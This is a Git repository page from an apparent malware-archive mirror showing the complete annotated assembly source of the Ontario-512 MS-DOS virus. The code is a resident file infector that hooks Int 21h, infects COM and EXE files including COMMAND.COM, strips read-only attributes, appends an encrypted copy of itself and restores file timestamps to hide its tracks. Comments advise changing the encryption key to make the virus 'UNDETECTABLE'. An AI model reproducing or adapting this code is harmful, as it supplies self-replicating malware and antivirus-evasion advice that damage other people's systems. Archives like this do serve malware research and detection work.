ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
56aef1cd67
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.ontar512.asm
vxunderground f76af55eb4
Add files via upload
2021-01-12 17:52:14 -06:00

297 lines
22 KiB
NASM
Raw Blame History

;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;-* Ontario-512 Virus *-
;*- ~~~~~~~~~~~~~~~~~~~ -*
;-* Disassmembly by: Rock Steady/NuKE *-
;*- ~~~~~~~~~~~~~~~~ -*
;-* Notes: Resident EXE and COM infector, will infect COMMAND.COM *-
;*- ~~~~~~ on execution. 512 bytes file increase, memory decrease -*
;-* of about 2,048 bytes. Anti-debugging, encrypted virus. *-
;*- -*
;-* (c) Copy-Ya-Rite [NuKE] Viral Development Labs '92 *-
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
virus segment byte public
assume cs:virus, ds:virus
org 100h ;Guess its a COM File huh?
ont proc far
start:
jmp go4it ;Jump to beginning of the
db 1Dh ;Virus And start!
db 'fected [NuKE]''92', 0Dh, 0Ah, '$'
mov dx,0102h ;This is the small File the Virus
mov ah,09h ;is infected to! As you see it only
int 21h ;displays that messages and exits
int 20h ;Exit Command for COMs
go4it:
nop
call decrypt ;Get Decryption value & Decrypt viri
call virus_start ;Start the Virus!
ont endp
;---------------------------------------------------------------------;
; The Start of the Virus Code ;
;---------------------------------------------------------------------;
virus_start proc near
pop bp
sub bp,7
mov ax,0FFFFh ;Is Virus in Memory hooked on?
int 21h ;the Int 21h?
or ah,ah ;
jz bye_bye ;Yes it is... Quit then...
push ds
xor ax,ax
mov ds,ax
sub word ptr ds:413h,2
lds bx,dword ptr ds:84h
mov word ptr cs:[200h][bp],bx
mov word ptr cs:[202h][bp],ds
mov bx,es
dec bx
mov ds,bx
sub word ptr ds:3,80h
mov ax,ds:12h
sub ax,80h
mov ds:12h,ax
mov es,ax
push cs
pop ds
mov si,bp
xor di,di
mov cx,204h
cld
rep movsb
mov ds,cx
cli ;This is where we hook the
mov word ptr ds:84h,7Fh ;virus to the Int21h
mov word ptr ds:84h+2,ax
sti
mov ax,4BFFh
int 21h
pop ds
push ds
pop es
bye_bye:
or bp,bp
jz what
lea si,[bp+7Bh]
nop
mov di,offset ds:[100h]
push di
cld
movsw
movsw
retn
what:
mov ax,es
add cs:7dh,ax
;* jmp far ptr go4it7
virus_start endp
db 0EAh,0EBh, 15h, 49h, 6Eh
cmp ax,0FFFFh
jne new_21h
inc ax
iret
;---------------------------------------------------------------------;
; Interrupt 21h handler ;
;---------------------------------------------------------------------;
new_21h:
cmp ah,4Bh ;Test, is File beginning Executed!
jne leave_ok ;Nope! Call Int21!
cmp al,3 ;Overlay, beginning execute?
je leave_ok ;Yes! Leave it alone
cmp al,0FFh ;Virus testing to see if its alive?
jne do_it_man ;in memory?
push cs
pop ds
mov dx,1DDh
call infect
iret
do_it_man:
call infect ;Infect file dude...
leave_ok:
jmp dword ptr cs:[200h] ;Int21 handler..
;---------------------------------------------------------------------;
; Infection Routine for the Ontario Virus ;
;---------------------------------------------------------------------;
infect proc near
push es
push ds ;Save them not to fuck things up..
push dx
push cx
push bx
push ax
mov ax,4300h ;Here we get the file attribute
call int21 ;for file to be infected.
jc outta ;Bitch Error encountered. Quit!
test cl,1 ;Test if its Read-Only!
jz attrib_ok ;Ok, it ain't Read-Only Continue!
and cl,0FEh ;Set Read-Only to normal Attribs
mov ax,4301h ;Call Ints to do it...
call int21 ;Bingo! Done!
jc outta ;Error encountered? Split if yes!
attrib_ok:
mov ax,3D02h ;Open file for Read/Write
call int21 ;Call Interrupt to do it!
jnc open_ok ;no errors? Continue!
outta:
jmp go4it5 ;Hey, Split Man... Errors happened!
open_ok:
mov bx,ax ;BX=File Handle
push cs
pop ds
mov ax,5700h ;Get File's Date & Time
call int21 ;Do it!
mov word ptr ds:[204h],cx ;Save Time
mov word ptr ds:[206h],dx ;Save Date
mov dx,208h ;DX=Pointer
mov cx,1Bh ;CX=Number of Btyes
mov ah,3Fh ;Read From File
call int21 ;Do It!
jc go4it1 ;Errors? Quit if yes!
cmp word ptr ds:[208h],5A4Dh ;Check if files already
je go4it0 ;infected.
mov al,byte ptr ds:[209h] ;Com , Exes...
cmp al,byte ptr ds:[20Bh]
je go4it1
xor dx,dx
xor cx,cx
mov ax,4202h
call int21 ;Move File pointer to end of
jc go4it1 ;file to be infected.
cmp ax,0E000h ;File bigger than E000 bytes?
ja go4it1 ;Error...
push ax ;Save File Length
mov ax,word ptr ds:[208h]
mov ds:7bh,ax
mov ax,word ptr ds:[20Ah]
mov ds:7dh,ax
pop ax ;All this is, is a complex
sub ax,3 ;way to do "JMP"
mov byte ptr ds:[208h],0E9h ;
mov word ptr ds:[209h],ax
mov byte ptr ds:[20Bh],al
jmp short go4it3 ;File READY Infect it!
db 90h ;NOP me... detection string?
go4it0:
cmp word ptr ds:[21Ch],1
jne go4it2
go4it1:
jmp go4it4
go4it2:
mov ax,word ptr ds:[20Ch]
mov cx,200h
mul cx
push ax
push dx
mov cl,4
ror dx,cl
shr ax,cl
add ax,dx
sub ax,word ptr ds:[210h]
push ax
mov ax,word ptr ds:[21Ch]
mov ds:7bh,ax
mov ax,word ptr ds:[21Eh]
add ax,10h
mov ds:7dh,ax
pop ax ; This is continues with the
mov word ptr ds:[21Eh],ax ; above to put a JMP at the
mov word ptr ds:[21Ch],1 ; beginning of the file!
inc word ptr ds:[20Ch] ;
pop cx ;
pop dx ;
mov ax,4200h ;
call int21
jc go4it4
go4it3:
xor byte ptr ds:[1F8h],8 ;
xor ax,ax ; Theses Lines copy the
mov ds,ax ; virus code else where
mov al,ds:46Ch ; in memory to get it
push cs ; ready to infect the file
pop ds ; as we must encrypt it
push cs ; FIRST when we infect the
pop es ; file. so we'll encrypt
mov byte ptr ds:[1ECh],al ; this copy we're making!
xor si,si ; and append that to the
mov di,offset ds:[224h] ; end of the file
push di ;
mov cx,200h ;
cld ;
rep movsb
mov si,offset ds:[228h] ;Now Encrpyt that copy of the
call encrypt_decrypt ;virus we just made...
pop dx
mov cx,200h ;Write Virus to file!
mov ah,40h ;BX=Handle, CX=Bytes
call int21 ;DX=pointer to write buffer
jc go4it4 ;Duh? Check for errors!
xor cx,cx
xor dx,dx ;Now move pointer to beginning
mov ax,4200h ;of file.
call int21
jc go4it4 ;Duh? Check for errors!
mov dx,208h ;Write to file!
mov cx,1Bh ;CX=Bytes
mov ah,40h ;DX=pointes to buffer
call int21 ;Bah, HumBug
go4it4:
mov dx,word ptr ds:[206h] ;Leave no tracks...
mov cx,word ptr ds:[204h] ; puts back File TIME
mov ax,5701h ; and DATE! on file...
call int21 ;
mov ah,3Eh ;
call int21 ;Bah, HumBug...
go4it5:
pop ax ;Get lost...
pop bx
pop cx
pop dx
pop ds
pop es
retn
infect endp
;----------------------------------------------------------------------;
; The Original Interrupt 21h handler ;
;----------------------------------------------------------------------;
int21 proc near
pushf ;Fake an Int Call...
call dword ptr cs:[200h] ;Orignal Int21h Handler
retn
int21 endp
db 'C:\COMMAND.COM'
db 00h, 84h
;---------------------------------------------------------------------;
; The Simple, But VERY Effective Encryption Routine ;
;---------------------------------------------------------------------;
decrypt proc near
pop si
push si
mov al,byte ptr cs:[1E8h][si];INCRYPTION VALUE TO CHANGE!
encrypt_decrypt: ;and Virus will be UNDETECTABLE
mov cx,1E8h ; LENGTH OF VIRII! Change this!
loop_me: not al ; if you modief the virus!
xor cs:[si],al ;
inc si ;
loop loop_me ;
;
retn
decrypt endp
virus ends
end start
;------------------------------------------------------------------------
Reference in New Issue View Git Blame Copy Permalink